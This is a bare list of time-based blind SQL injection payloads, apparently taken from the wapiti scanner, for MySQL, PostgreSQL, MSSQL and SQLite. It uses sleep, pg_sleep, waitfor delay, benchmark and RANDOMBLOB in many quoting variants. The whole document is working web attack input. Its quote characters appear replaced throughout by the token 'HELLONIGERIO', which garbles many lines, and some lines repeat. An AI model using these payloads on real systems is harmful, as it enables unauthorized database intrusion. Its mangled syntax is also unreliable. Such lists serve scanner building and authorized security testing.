# from wapiti
sleep(5)#
1 or sleep(5)#
HELLONIGERIO or sleep(5)#
HELLONIGERIO or sleep(5)#
HELLONIGERIO or sleep(5)=HELLONIGERIO
HELLONIGERIO or sleep(5)=HELLONIGERIO
1) or sleep(5)#
HELLONIGERIO) or sleep(5)=HELLONIGERIO
HELLONIGERIO) or sleep(5)=HELLONIGERIO
1)) or sleep(5)#
HELLONIGERIO)) or sleep(5)=HELLONIGERIO
HELLONIGERIO)) or sleep(5)=HELLONIGERIO
;waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
);waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
HELLONIGERIO;waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
HELLONIGERIO;waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
HELLONIGERIO);waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
HELLONIGERIO);waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
));waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
HELLONIGERIO));waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
HELLONIGERIO));waitfor delay HELLONIGERIO0:0:5HELLONIGERIO--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
HELLONIGERIO or benchmark(10000000,MD5(1))#
HELLONIGERIO or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
HELLONIGERIO) or benchmark(10000000,MD5(1))#
HELLONIGERIO) or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
HELLONIGERIO)) or benchmark(10000000,MD5(1))#
HELLONIGERIO)) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
HELLONIGERIO or pg_sleep(5)--
HELLONIGERIO or pg_sleep(5)--
1) or pg_sleep(5)--
HELLONIGERIO) or pg_sleep(5)--
HELLONIGERIO) or pg_sleep(5)--
1)) or pg_sleep(5)--
HELLONIGERIO)) or pg_sleep(5)--
HELLONIGERIO)) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND HELLONIGERIOvRxeHELLONIGERIO=HELLONIGERIOvRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND HELLONIGERIO%HELLONIGERIO=HELLONIGERIO
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)=HELLONIGERIO
SLEEP(5)=HELLONIGERIO
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)=HELLONIGERIO
or SLEEP(5)=HELLONIGERIO
waitfor delay HELLONIGERIO00:00:05HELLONIGERIO
waitfor delay HELLONIGERIO00:00:05HELLONIGERIO--
waitfor delay HELLONIGERIO00:00:05HELLONIGERIO#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
HELLONIGERIO\HELLONIGERIO
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
HELLONIGERIO AnD SLEEP(5) ANd HELLONIGERIO1
HELLONIGERIO&&SLEEP(5)&&HELLONIGERIO1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+HELLONIGERIO
+ SLEEP(10) + HELLONIGERIO
RANDOMBLOB(500000000/2)
AND 2947=LIKE(HELLONIGERIOABCDEFGHELLONIGERIO,UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE(HELLONIGERIOABCDEFGHELLONIGERIO,UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE(HELLONIGERIOABCDEFGHELLONIGERIO,UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE(HELLONIGERIOABCDEFGHELLONIGERIO,UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*HELLONIGERIO or SLEEP(1) or HELLONIGERIOHELLONIGERIO or SLEEP(1) or HELLONIGERIO*/
